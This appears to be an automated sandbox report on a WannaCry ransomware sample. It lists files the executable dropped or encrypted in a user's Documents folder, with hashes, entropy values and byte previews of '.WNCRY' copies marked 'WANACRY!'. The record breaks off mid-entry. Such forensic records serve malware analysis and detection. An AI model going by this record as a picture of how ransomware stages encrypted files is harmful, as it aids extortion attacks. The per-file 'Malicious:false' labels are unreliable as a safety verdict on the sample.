                                Preview:WANACRY!........i...4.h...&3.?.8)UQOXz.Uq.E........<L.K&g,.....@(k.7y`.x.I.....G%#........X.....@_,..w...G.#.....z\.#3.N...=...z......EL.5.|...Lj...R..s.ZG.@.B...7.$..j.S3.a.`=.sC...@..G.....6Lq.7D......4.#.p.9.....E.X.M.p.....oh..i.....DP..h.....k.B.............M...]..yTB..~.-t.&F&<.R.CdUZ...aX.4.+:..HL.@..R;....@..~Y.....U...&..v."..._.qL..tt(....W..u$r..+....WA..N@.=..P....|...g*.c3e......,..).[..Q..?;Uv..V.].....>.1....@..2gp..x.............}kL..RP..lS.e....l)..n<.....'$5.k...u...IG..Q...t.hM....b.\9.].......3......V..?..=.0..m...........V.W5.""......*$....4..&$..k..[g......c....L.z....8D..}........@.g;>.j..E..E#..0.+;&....)G1.""..........Q..X}.%...B%+...1.$!..~3`.F.V.wE(nqnp..M......M...s.-.....q.a.p...0.b.S*.M.R.Io.8.....\..do$....e.~..^W...h...$..%......v9.P.R.;3..c>..O...9Y...c@.'O.....5....Hr..uE>@<..Ve....!E..?..zl...;...M.....C..{_..l..!..)..|b.+.....!...8..P....r...]....W .?.9..CjS..D.D,W..Be.....z...;f.f.........".,_37"7T.......

                                C:\Users\user\Documents\EEGWXUHVUG\GLTYDMDUST.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.847670724050078
                                Encrypted:false
                                SSDEEP:24:bkqUBw4gATrJXtKtkY2Syfm8B5MAY+1x52WmGBuibAi71hFWJ254TZYX54WfVJ11:bkprg8rJXoNyfm8B5YGwdYHb571bFmKn
                                MD5:083E308E3777D2F92481313C5BD26999
                                SHA1:979714B0E2E049F670382E7F90D58C842244F666
                                SHA-256:A296885AC57F854F6A8A9B959C1744714526F4DD8066D0C8ACE4DB4451A4A8C0
                                SHA-512:ED09D7D209929E3A67D5E389531A76032D54D4EB3FD8D3D4F728B9A9EB1BF00E0E166FFF52FFC4FA9B0F74312EB66DF088C13AD3CF3954353F8935222A2079C5
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!........i...4.h...&3.?.8)UQOXz.Uq.E........<L.K&g,.....@(k.7y`.x.I.....G%#........X.....@_,..w...G.#.....z\.#3.N...=...z......EL.5.|...Lj...R..s.ZG.@.B...7.$..j.S3.a.`=.sC...@..G.....6Lq.7D......4.#.p.9.....E.X.M.p.....oh..i.....DP..h.....k.B.............M...]..yTB..~.-t.&F&<.R.CdUZ...aX.4.+:..HL.@..R;....@..~Y.....U...&..v."..._.qL..tt(....W..u$r..+....WA..N@.=..P....|...g*.c3e......,..).[..Q..?;Uv..V.].....>.1....@..2gp..x.............}kL..RP..lS.e....l)..n<.....'$5.k...u...IG..Q...t.hM....b.\9.].......3......V..?..=.0..m...........V.W5.""......*$....4..&$..k..[g......c....L.z....8D..}........@.g;>.j..E..E#..0.+;&....)G1.""..........Q..X}.%...B%+...1.$!..~3`.F.V.wE(nqnp..M......M...s.-.....q.a.p...0.b.S*.M.R.Io.8.....\..do$....e.~..^W...h...$..%......v9.P.R.;3..c>..O...9Y...c@.'O.....5....Hr..uE>@<..Ve....!E..?..zl...;...M.....C..{_..l..!..)..|b.+.....!...8..P....r...]....W .?.9..CjS..D.D,W..Be.....z...;f.f.........".,_37"7T.......

                                C:\Users\user\Documents\EEGWXUHVUG\KLIZUSIQEN.jpg

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.790795120732516
                                Encrypted:false
                                SSDEEP:24:7VkLSXZLDFkhMM5TnLHYB8KxAUmmxoCINndKwxd:7VkfZ5rKxA/mxovOyd
                                MD5:E5CD8FD465C4528F8522CF128DFEBB1A
                                SHA1:CFA2072DCDBDBE506C92EB8E6B1FCAB5F20C0314
                                SHA-256:57FC1A6DC1DBF01392A4B19648246ADAB9AEA08B79C7BF0B8D85F30E99A6F372
                                SHA-512:9EB3BD99790B713F9014ABF644E46DE4B09210985D09F02D1D65168A8FEFF3EC2CDF102641D6E376F65EB4BFE5D388E7004FC79FD1111AFC2DA771D7246D371D
                                Malicious:false
                                Reputation:unknown
                                Preview:H.W.VB..3,+{...9j.v8.....\..7..L/.0%9.~...G.j...D..$r..M..,...n.A.y.$.V...x.4,(*.f..`...k..2..=ut....].q.....1)......c.$.H.....U...[6.. &.".......x...U5R.cB.!u..._w.tK..w.z1...{N.a%<^.&.'m..c.......{LN%\s....,>...AET.D..1....h..U.....1....a.Z..p1].!.q3E4...7..........c....^..5Kn.y.....3!Kpr........7..|......v.8.?;k.(B."....m.KV.....Zg..W....k.......v.......u.\x....H."..FE....y..9S..7.\.......s_..p...h...Y[..~( j..4oq>..hcuk..*.....Q1.|. ....(.O0..a......2.N.5F8&...G...;....yG..}......{....X;P..pn.S^.M..0..*..d4.......<..&?.&.].1.rS].:..At%..Y].]..\"..VD_F.e.L.n)..5u,.......S......`.{X.X.P.^.~X.Y.wgk&...ju.(.c?T.6..|#.v..E...Pt...N`.l..&.F.j{z.j..g.L..\.V....X..t.x.2y..`\...*>...n.A.Y...sf3..+'%..nN..s.$.....<y.CD.:..."...T.n..{..&_e.gv.F...>...T.)..#-j...b.....Mo..;.p.^...]%8..2G..-..s.:../B..niY%.n0......H......%DM!....~..;(..0.V....\..l...uK.f.?..yG..C).@...ko..]T.C.iRJU..0.d...o)..7vt..V"./<...P..8.+.v....brA`|3@.fW.|.kk..(>Y.."L.?..\`$5.

                                C:\Users\user\Documents\EEGWXUHVUG\KLIZUSIQEN.jpg.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849810154162804
                                Encrypted:false
                                SSDEEP:24:bkNUT9OkjfZNQX0xukrzwEm2jjkJFVyiII9Th39u5pJv2ZoKJWr:bk2xOr3krzFf4JIeJ9uzOo1r
                                MD5:AE6B13C07ABED5D9B214B7C568C9F632
                                SHA1:EEBFC16A8CFEF0ED8C4198CA57D2048BE5CFCA44
                                SHA-256:C4E43212E608F740602245FA4812C367CE2322AE2657FA5FA02616DCF548B633
                                SHA-512:81BF657AF32404A77FECD5FE636B3A07276D324A9E266E1D9BF6468A42388E0318CFF369C5E4030355BF607309DF9E74E8185F00F32275AB5F7F22EAB1AD83B4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....U.3.G.f..+.2..Ju.......s9.Bw..4.....$.Y.r.8M..B..8._0...n..0...s%fG.........4y7l.c.e.s.a.sg...g.;c1.Y....N...)..+|...aG......s.y._.z<s).-....2..=g..W.2.O...?.9.6..R.h$..r.w!?.y..MRb...." ...qq.0W.;.d.9..[.%X..F.<..G.PI....F.`c..."b.S..(...#..m.-............Z}..o2.V.....%E!8..Vt.Kd.--...G.k..[.K(%;.p...?.K.. ...|.O..~c~..[mD.1l......ae.....p....5..([Q.I..../a.b|z.!.mT.3.B.we..>1.!.0..0.......;.S....i.S....0X........[.-...x.y.y4l.V..........z!M0....u.....[.e..v7.&.K.8d.#9..v.>...36.$...Ap..GC...........~0KB.<.$.V.{......hW..'.wto.....f.b.9F..K...s ...w.D..P......s...nzA.|&.......8}'...............G..._...Y.g....C.9|..?.F0X7..)d .....m<.4..L...u^.5.....U..W....n....R^#..J..Z.^.`.+.7Am.aY..zy.H.kW.u@[.~".l.'..zY...tEl.d*.~z.Y........K.....9MY..kk..T..Bs%.d..`.^{..p.{..fX...@....zn..a.z....-...T.T...9a= \.......3..r..+cO.O..:.m6)5...UHDy.x..........d..m.p6.:_...i...@..j.d.l..5|...`.I.o..'. ....}s............#Q.7.e/..z..7.4p.u-|....*1...6..P]3.../2

                                C:\Users\user\Documents\EEGWXUHVUG\KLIZUSIQEN.jpg.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.849810154162804
                                Encrypted:false
                                SSDEEP:24:bkNUT9OkjfZNQX0xukrzwEm2jjkJFVyiII9Th39u5pJv2ZoKJWr:bk2xOr3krzFf4JIeJ9uzOo1r
                                MD5:AE6B13C07ABED5D9B214B7C568C9F632
                                SHA1:EEBFC16A8CFEF0ED8C4198CA57D2048BE5CFCA44
                                SHA-256:C4E43212E608F740602245FA4812C367CE2322AE2657FA5FA02616DCF548B633
                                SHA-512:81BF657AF32404A77FECD5FE636B3A07276D324A9E266E1D9BF6468A42388E0318CFF369C5E4030355BF607309DF9E74E8185F00F32275AB5F7F22EAB1AD83B4
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!.....U.3.G.f..+.2..Ju.......s9.Bw..4.....$.Y.r.8M..B..8._0...n..0...s%fG.........4y7l.c.e.s.a.sg...g.;c1.Y....N...)..+|...aG......s.y._.z<s).-....2..=g..W.2.O...?.9.6..R.h$..r.w!?.y..MRb...." ...qq.0W.;.d.9..[.%X..F.<..G.PI....F.`c..."b.S..(...#..m.-............Z}..o2.V.....%E!8..Vt.Kd.--...G.k..[.K(%;.p...?.K.. ...|.O..~c~..[mD.1l......ae.....p....5..([Q.I..../a.b|z.!.mT.3.B.we..>1.!.0..0.......;.S....i.S....0X........[.-...x.y.y4l.V..........z!M0....u.....[.e..v7.&.K.8d.#9..v.>...36.$...Ap..GC...........~0KB.<.$.V.{......hW..'.wto.....f.b.9F..K...s ...w.D..P......s...nzA.|&.......8}'...............G..._...Y.g....C.9|..?.F0X7..)d .....m<.4..L...u^.5.....U..W....n....R^#..J..Z.^.`.+.7Am.aY..zy.H.kW.u@[.~".l.'..zY...tEl.d*.~z.Y........K.....9MY..kk..T..Bs%.d..`.^{..p.{..fX...@....zn..a.z....-...T.T...9a= \.......3..r..+cO.O..:.m6)5...UHDy.x..........d..m.p6.:_...i...@..j.d.l..5|...`.I.o..'. ....}s............#Q.7.e/..z..7.4p.u-|....*1...6..P]3.../2

                                C:\Users\user\Documents\EEGWXUHVUG\NYMMPCEIMA.png

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.748464623869378
                                Encrypted:false
                                SSDEEP:24:+/IwmtBIok4HuDmTQ+YgFik8GZi/BFgYXyYNG:+/Iw0xOs3YgjZi/ByYa
                                MD5:5FCF31736EACB90E0BE98D0BC6748C2F
                                SHA1:4DC0996AB9CC9C46A034891E37EA6056F64552D8
                                SHA-256:B76993FBBFC0E7B390D96D1BAE8618DF9134F90C6718A7030FA2B8632294D9ED
                                SHA-512:4A620580609D771BEE02DB009F344920DF5C459785432C034A1F55D1855AC54165516070A84C776805B930A6E41447B9D21F234B0F333F4C51F6E7C736A5E766
                                Malicious:false
                                Reputation:unknown
                                Preview:8..qc.!..D.T.qZ.."..9X.i............r.#....Wi...[..y$.9Jd4]l.+n<]...9n.1..\.......P...Um"o.7...<x.L{g...\......C.X..p...%z......O...%_^0L!Qr.|2.U...2.v;7..?tO"..3...*m-........"..l..$.W..+..Kh..7.........T....r.........P..^..qy-...h....."d.dT.rC t....b...o..>...C`..g..=...O.T.U'F..K..|g$E..hF"3.Y..C......EL.u......_,.)...b.{.6.U'.,..+......H> ..j.j...~d.h|.#|...T...m...@Q.....*!w.....u..l.`I.5^.w.....]b..}..i.t.N..LB...s|.\i..d..n.|....+D].f].1..-.0Bz.6.S...F..v....>.6...k39..."....OW...../. ..E.0C.......V.....b. .iI....z..xTu..!|.....K8....y...I.@.)`.....tV.C0.X..*..0...Qd~K\...I.:/...g..L.".o.`P|h...N..~E...g....1..9m.nE.jE......d+C.Mk...>9q`h-n..[.x.)..,.z.7.....fe..1....)....,...C.._.L..\.%...B.:.N..<.}....x.fE..f1kh.....%(.Og...I]...;x.SVgCS.i..1U.H...j8.d...@C.....#...Ji.+7,.Q..`..z..IC.1....u.C@&...... .{.....W.2!v....7.:.E..Uw.?F.....C"V.B..b...o.....':........:[..L...........(.+.... ..!c..aY.4...a........C.4.E.."...tT!^M..{.^.!...l

                                C:\Users\user\Documents\EEGWXUHVUG\NYMMPCEIMA.png.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.834181705767735
                                Encrypted:false
                                SSDEEP:24:bkCcaIcWF7p/CsQUnEV3wpHCs1YiGdg+VOgs2bV2AA2c3a5yd71olQKDp:bkaIn7JCvwEVKiePGGgseVpAR3GyTQTF
                                MD5:E256833A44ABB929B2A87E9A98C1DC19
                                SHA1:2EB15FCADA768D3AAAF47368802B9B74A3225377
                                SHA-256:F24F4CB0273AE63895A75833C5923ACBF1DB4E26CF3D5BDA5A1D00F1D33FEF63
                                SHA-512:17E66B8FC7FD78C2B080815622328625187FAADEC45BCAB503A8D91F453FABDDC8146FE81917481DCE6C336DBF41A3B8F4A33055187B217264C2EB912A0806F3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....$........IF.f.X*Q......Ua........#...Yy.(..<..45_'.s.p'.'<.a0.5jK.n3.e...7.......a.G........&HY....}.X.).VH.U$@..,.J..`...x....+.]..?.@.o.....)W......7..m..3K.>.R2.1*..\JDP...../.Kp..(4&_..3..&@.y.....a..6.#.3Rc..`..|.&R|....H.@.@.N.....x..............ro..g$..).._aD.\.d.,..x\.U....`s....I...W..)A.&..+......4.H..X.+..w[]|6I.t.\.D~.H...{R.....U..CR.'.5.....-.Z.ME......8..i..<.>.D.A.n.....j.x.TP..r....}........Nn..7b..oN.U.6....*..ypx../[.'.}e.@.`v.h...*..!.?.sq....l..>........,.KR.......].d.E..V....c...=..S2&['.J..9.f....'.#.z....E8..Up....$4....'..e.<.....@"".)........M....BA.O}.4.4....R..:.ah.B.m|..C.y;..W.u.f.V..<.z...n..........vr..7.8....t..E=9u[5U..*..j.r.[dF%{.T..6.4.......t.&.}?...2B.....\T.F.......t..r`]|ew.M......1..k.Y..al^A....Z.......>Bqr....wY5zV..?.P..{.B.ca.w.....E.K.....w...../..VHn.*M$...UZZ-j...'{.l,.iq.FL.....3#z./.Q|.z.qPP..b..e..0MO4c.I.T..?~.....H.!B-`P...t.p...!......8..R3......."..{.>..AJ^'..#

                                C:\Users\user\Documents\EEGWXUHVUG\NYMMPCEIMA.png.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.834181705767735
                                Encrypted:false
                                SSDEEP:24:bkCcaIcWF7p/CsQUnEV3wpHCs1YiGdg+VOgs2bV2AA2c3a5yd71olQKDp:bkaIn7JCvwEVKiePGGgseVpAR3GyTQTF
                                MD5:E256833A44ABB929B2A87E9A98C1DC19
                                SHA1:2EB15FCADA768D3AAAF47368802B9B74A3225377
                                SHA-256:F24F4CB0273AE63895A75833C5923ACBF1DB4E26CF3D5BDA5A1D00F1D33FEF63
                                SHA-512:17E66B8FC7FD78C2B080815622328625187FAADEC45BCAB503A8D91F453FABDDC8146FE81917481DCE6C336DBF41A3B8F4A33055187B217264C2EB912A0806F3
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....$........IF.f.X*Q......Ua........#...Yy.(..<..45_'.s.p'.'<.a0.5jK.n3.e...7.......a.G........&HY....}.X.).VH.U$@..,.J..`...x....+.]..?.@.o.....)W......7..m..3K.>.R2.1*..\JDP...../.Kp..(4&_..3..&@.y.....a..6.#.3Rc..`..|.&R|....H.@.@.N.....x..............ro..g$..).._aD.\.d.,..x\.U....`s....I...W..)A.&..+......4.H..X.+..w[]|6I.t.\.D~.H...{R.....U..CR.'.5.....-.Z.ME......8..i..<.>.D.A.n.....j.x.TP..r....}........Nn..7b..oN.U.6....*..ypx../[.'.}e.@.`v.h...*..!.?.sq....l..>........,.KR.......].d.E..V....c...=..S2&['.J..9.f....'.#.z....E8..Up....$4....'..e.<.....@"".)........M....BA.O}.4.4....R..:.ah.B.m|..C.y;..W.u.f.V..<.z...n..........vr..7.8....t..E=9u[5U..*..j.r.[dF%{.T..6.4.......t.&.}?...2B.....\T.F.......t..r`]|ew.M......1..k.Y..al^A....Z.......>Bqr....wY5zV..?.P..{.B.ca.w.....E.K.....w...../..VHn.*M$...UZZ-j...'{.l,.iq.FL.....3#z./.Q|.z.qPP..b..e..0MO4c.I.T..?~.....H.!B-`P...t.p...!......8..R3......."..{.>..AJ^'..#

                                C:\Users\user\Documents\EEGWXUHVUG\ZGGKNSUKOP.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.82207212013011
                                Encrypted:false
                                SSDEEP:24:rFUOk8dM9xQyrmL39okFEbtPJIq0+N/8IGvfvc:tMTZENokFSIq0+mlHvc
                                MD5:828D31DA66A5504D8D69856C51B359FC
                                SHA1:FA907290255F3A422536251BE08B706EEDC7CCEE
                                SHA-256:4210D3C99EBEBC861EE86D3D4D560C478D352B8A5DADBA133A2324A074F030BB
                                SHA-512:5424D009AF677BB01ABB96D234B0ECD116932E89EFADE7E0AFF0FD83E6EB35482402F57536267247B214C028033E35827ADE30EA728A0290858D49515581AC2E
                                Malicious:false
                                Reputation:unknown
                                Preview:..........O.@....ZB^...c7.F9IC...[.........p.T.,....Z.z....@.{..\.9......:...o..YG..lb.iE{..4......T...1.`[.....*./'#W*%y.D...c.|.....e.......i.u.. ..C....9/.j...[..z).$..B...CO{(......,..s.M.......[.^K.X...r.U.m.cp.........N...p.....3.g.vK.....I.L...k.q.*.b..4\..I.Y...cG.Fs....Fpc.E.;...o.gyA.u.ZA.i..<....6'.M.!...Ow.4:..x.x...H..............?L....D#._...2.X..}.9f......Hd...Yy..P2 .G...I.Fg/Q.jW.".*.~.7.-........v.'D...i.j.....5....#.Ywl.......:.p.2.^....P.....09=..6..e..n..Z;L._....>.u........6-D.....K..q.d..ph...9...4....Kt......;]....{:.GP.*.)6V.#...C...i.)-.]J+4..:.~po...gU.';a%u...."nV...W.W.I8....dr......P*.=I.........j.n...c]f.....:.1..&9.......N%.\....]....(.F..|.4.....i.m.c[=.+......u.....=.0.H|.w..So-....5..9.....j.,n.b......V......&.3-R!..#.Km..N..,..$.IM........4l....kMO85.$BX|..].4-.L.&.......U4.E..&...x..5.cN.|...........J....ymf?t.....".b........>8...z..A..+..@..M..|:..G..0.[.W..g....f..Xb...[.(>.K...>.P+}.8)X.V=W.R

                                C:\Users\user\Documents\EEGWXUHVUG\ZGGKNSUKOP.pdf.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.851327944838939
                                Encrypted:false
                                SSDEEP:24:bkZ7uoKjAQC+XQezp+Wo0jWHb4LSTE+eYw2Aps5DW36mBPo5YHxk+n0LkR:bkZ7uo0AT+XQo+uWMtYjQsR060PiYHeA
                                MD5:F3D6352623A8F2021B03F8B45C925D8F
                                SHA1:DA68AC135B46EAF32D175910DB2F1ED8731128C1
                                SHA-256:0D6C59B572E0C6C9A1CE41B213F1CA0BEE0147FB8164ADD252B1304344AE2161
                                SHA-512:09724E224916F1C08C1FBDA9042EC6A363AF33542FCDD351E2D68753C13CFCD6812C8512A5222467BFBFB645A4DCC2200A187B67F8C81CFD4617C7F6F9919689
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....$.@b...Jm.,-.......tA..Lwb..8.O....]V...=.e...#O...6T.....i..k@>`ls.d....,..$$S.....G......a..%.....m7...d.e.....L>..m....~U..+.)...S..J.%.i....lR...L.y.....fq.W. ?r6...4.JA..P..^....e....Q....[T..%....E...$s..q+...Z..f.......f..Ug....?................M[v. ...wM# ..C......2z.,..w.S.A.Y......D..W.....T.p....i...<...;..P..".?.9.n...~.*.^..].5@.X.5...;mE.4...P.x.N...\.4.{O......il..s-......L<B.$.P....y...70.....q2....^N..aC......1h<....)..)b.8._`#......ao.Cj}I.^..H....I.&..d.jO..,k_\.T ] .L..AUv.~.....D.8.....r..f..:.'..^.>y`.V4..+.r..;.6..b..*,G.I..n3.8.....'.Z..Xkg^.U.jj.M...8.9..u..O....>..j.a....K.xU.V=g.`.R.e.yV/.u.y..Goj'%.]B....V+...9....I..Q%EX|w..<@.....`..B.hh.{POb...........9...|..(.....[:..a..._ ..o..O0.....nH..,...]S.l...#X..h..S..[..`.~!..B...........`.M.b0m.]..O=`...Qu.K.k..g.....JB2.....UT..)........r..F1sb[y..b..d.F.....N..D'g.wA.i.@._..-......s.J=.%......./.G......H.f...z..?0..#........{.a.&.g..ie..=.....~.....|.

                                C:\Users\user\Documents\EEGWXUHVUG\ZGGKNSUKOP.pdf.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.851327944838939
                                Encrypted:false
                                SSDEEP:24:bkZ7uoKjAQC+XQezp+Wo0jWHb4LSTE+eYw2Aps5DW36mBPo5YHxk+n0LkR:bkZ7uo0AT+XQo+uWMtYjQsR060PiYHeA
                                MD5:F3D6352623A8F2021B03F8B45C925D8F
                                SHA1:DA68AC135B46EAF32D175910DB2F1ED8731128C1
                                SHA-256:0D6C59B572E0C6C9A1CE41B213F1CA0BEE0147FB8164ADD252B1304344AE2161
                                SHA-512:09724E224916F1C08C1FBDA9042EC6A363AF33542FCDD351E2D68753C13CFCD6812C8512A5222467BFBFB645A4DCC2200A187B67F8C81CFD4617C7F6F9919689
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!....$.@b...Jm.,-.......tA..Lwb..8.O....]V...=.e...#O...6T.....i..k@>`ls.d....,..$$S.....G......a..%.....m7...d.e.....L>..m....~U..+.)...S..J.%.i....lR...L.y.....fq.W. ?r6...4.JA..P..^....e....Q....[T..%....E...$s..q+...Z..f.......f..Ug....?................M[v. ...wM# ..C......2z.,..w.S.A.Y......D..W.....T.p....i...<...;..P..".?.9.n...~.*.^..].5@.X.5...;mE.4...P.x.N...\.4.{O......il..s-......L<B.$.P....y...70.....q2....^N..aC......1h<....)..)b.8._`#......ao.Cj}I.^..H....I.&..d.jO..,k_\.T ] .L..AUv.~.....D.8.....r..f..:.'..^.>y`.V4..+.r..;.6..b..*,G.I..n3.8.....'.Z..Xkg^.U.jj.M...8.9..u..O....>..j.a....K.xU.V=g.`.R.e.yV/.u.y..Goj'%.]B....V+...9....I..Q%EX|w..<@.....`..B.hh.{POb...........9...|..(.....[:..a..._ ..o..O0.....nH..,...]S.l...#X..h..S..[..`.~!..B...........`.M.b0m.]..O=`...Qu.K.k..g.....JB2.....UT..)........r..F1sb[y..b..d.F.....N..D'g.wA.i.@._..-......s.J=.%......./.G......H.f...z..?0..#........{.a.&.g..ie..=.....~.....|.

                                C:\Users\user\Documents\EFOYFBOLXA.mp3

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.8182314850240395
                                Encrypted:false
                                SSDEEP:24:zin0r80f59W5vQB7FERNFvIXTfAtTe4AAUed69gLEQBZ9g/:mn0jjdFEXFvWUljAAUDgAQXo
                                MD5:7E09C693D40E6E27DC824322FA719555
                                SHA1:574DDCB53C1F02AD647CB2008D5F26B93400687B
                                SHA-256:D8AF7762BAD2AAE62C626DCA8D5553120719F69CE07E2DBAFCA054660A716350
                                SHA-512:35B2910A7F4A1E182F9D8DB63E58171FABFD00456BA50CBD76BCE0FDCBCD2CB163C1FB2786694CB455865FA0D30D3E3949EA9057B5164778A67B0E89405CE222
                                Malicious:false
                                Reputation:unknown
                                Preview:..I.....$v... .b...FQ[.......4g...?.8.p.y...w.'..D.K....."..F....+..3......A?.....k...9g.q.}I.I..6.t...-..*...7...W_.|..y.F]Z...9.B.S..h.%..F.#.|..?..0....t$.\...1.#...N.~.J..k\..GS.E...'....?S..|..e 4.4.._....Z\.Y..1.xR!..c...9..ZD...N....I]y,".Y\I.F..+0K$...........N..O.K..a.%.......&g......H.?...P.......L.U..d..z.7/{.........u..U.8[WCF..e..O....c..}.|B..p.No4......y..>{3A.h.....%....xT$...y..V2...l.|.wM.....Lw.0m....}>..E.O5B.....10J. h.....-.?..xU9,.2.+Mh..i...eZ.0.J.Y.vYxP}....0D....amJ.5.X(...t.=jR......#.|..d.t..........D.I.)B....4W...v...%..F.S|E.BG.&...i....D.N..S'D.....".?l...w..t@...\...-(.......d.r G<9<..K...Y.....8I.d]nu+Y}.......%.VK!...&....dUS5..o;.....ZX.O1. x..F.K..2.}F..6..j<...9 .|/.w}G.n.....&6.l....v......W.i..?G3-.=....is...%..Vm.c.....&/m..k..Z..t.mJ.....6....@Z-..ruN............h~vd.L|.[{/...?....Ia.Z........G/:e.o...qX.5.P.......f.q....-(....+.v.......r...e.;.8......:...o......j...H...........}.]f.......z.

                                C:\Users\user\Documents\EFOYFBOLXA.mp3.WNCRY (copy)

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843430559970064
                                Encrypted:false
                                SSDEEP:24:bkxFIaGAtwSFUGig5w76QLuEg0kpUp4sQyJ94Cj7Hz+Sfc8RhAx0EPRT8Hs:bkLLGNSDiIw7xCEg0kpWbBJjzXE8Rix1
                                MD5:26EAB6429E5270C0F12C81909BBA23AF
                                SHA1:85144743C6E4E5ECCD0EFAAEF2813788F6759C6F
                                SHA-256:041BC486E40A751E126F07935638A1FC34D7494FFE38F75D6C7E13974A27B887
                                SHA-512:EF5E809AE5ED65385B8AFDFBBE8BA1E3EC2A89D8704B24FCBA979580F0FC6183B32BE9C05EEEAD09896C98DFE85DDC644EE0BDBA20F262509152C3F3EF262385
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......w..I..i..h...!.-...u.stt8.Q.Uy..k~..n.`b4y[;...._...j...."s..W..}..z...E4....}..R...H..8......v..M....?!``..&5Z...i.?.....G]..Y.o.....k....|EB..&..hj....@..q..9.....cj..M.;w.....m...t........^9mN.. .s.....+;3. X.,......8D..i.V........#..~. .+3............:.-.A...B.h....0'%......a..!.zZ`........._.t....w.....&.`....29^.g...2...d.C.....s....5..z..S...hl.....F..~YQ..!.M.42n..|h&.V>~..0.J!.0.^.s.....X..q..U.'..kj*........#..F...n....M.m.......$nW.......4...!..GC....~l...c.-\.....d.T.kv.A.J......\.c..M..(....0..e"3.....9.m.....Y....'*..!(.3R.M...&.X.A0`...n...H..;.d..0...N.t.JL..8...*....V...{.5.......{g.....{.y....N.,...r%.{._E.).c...D{.|..s.....~.....hz6B..#U+..w...I....0.L?...G...].4..j....P.....I...:LB...)qS.!=.vlcd..l.&%.qj.3..XX...j.T....$...'..x..Y../...6z..v.......b#~".1..,....i.K..P3n.\.2......<3..7$%..fcSQ....!..TS..B...^j-..^...@.#x...UP.|....kl.~.(k...jX..../. U...r..v.Yi.@....o.< .;..{......e..[*.p..AC......

                                C:\Users\user\Documents\EFOYFBOLXA.mp3.WNCRYT

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1320
                                Entropy (8bit):7.843430559970064
                                Encrypted:false
                                SSDEEP:24:bkxFIaGAtwSFUGig5w76QLuEg0kpUp4sQyJ94Cj7Hz+Sfc8RhAx0EPRT8Hs:bkLLGNSDiIw7xCEg0kpWbBJjzXE8Rix1
                                MD5:26EAB6429E5270C0F12C81909BBA23AF
                                SHA1:85144743C6E4E5ECCD0EFAAEF2813788F6759C6F
                                SHA-256:041BC486E40A751E126F07935638A1FC34D7494FFE38F75D6C7E13974A27B887
                                SHA-512:EF5E809AE5ED65385B8AFDFBBE8BA1E3EC2A89D8704B24FCBA979580F0FC6183B32BE9C05EEEAD09896C98DFE85DDC644EE0BDBA20F262509152C3F3EF262385
                                Malicious:false
                                Reputation:unknown
                                Preview:WANACRY!......w..I..i..h...!.-...u.stt8.Q.Uy..k~..n.`b4y[;...._...j...."s..W..}..z...E4....}..R...H..8......v..M....?!``..&5Z...i.?.....G]..Y.o.....k....|EB..&..hj....@..q..9.....cj..M.;w.....m...t........^9mN.. .s.....+;3. X.,......8D..i.V........#..~. .+3............:.-.A...B.h....0'%......a..!.zZ`........._.t....w.....&.`....29^.g...2...d.C.....s....5..z..S...hl.....F..~YQ..!.M.42n..|h&.V>~..0.J!.0.^.s.....X..q..U.'..kj*........#..F...n....M.m.......$nW.......4...!..GC....~l...c.-\.....d.T.kv.A.J......\.c..M..(....0..e"3.....9.m.....Y....'*..!(.3R.M...&.X.A0`...n...H..;.d..0...N.t.JL..8...*....V...{.5.......{g.....{.y....N.,...r%.{._E.).c...D{.|..s.....~.....hz6B..#U+..w...I....0.L?...G...].4..j....P.....I...:LB...)qS.!=.vlcd..l.&%.qj.3..XX...j.T....$...'..x..Y../...6z..v.......b#~".1..,....i.K..P3n.\.2......<3..7$%..fcSQ....!..TS..B...^j-..^...@.#x...UP.|....kl.~.(k...jX..../. U...r..v.Yi.@....o.< .;..{......e..[*.p..AC......

                                C:\Users\user\Documents\EFOYFBOLXA.pdf

                                Download File
                                Process:C:\Users\user\Desktop\2N2jefqo8e.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):1026
                                Entropy (8bit):7.834630839303821
                                Encrypted:false
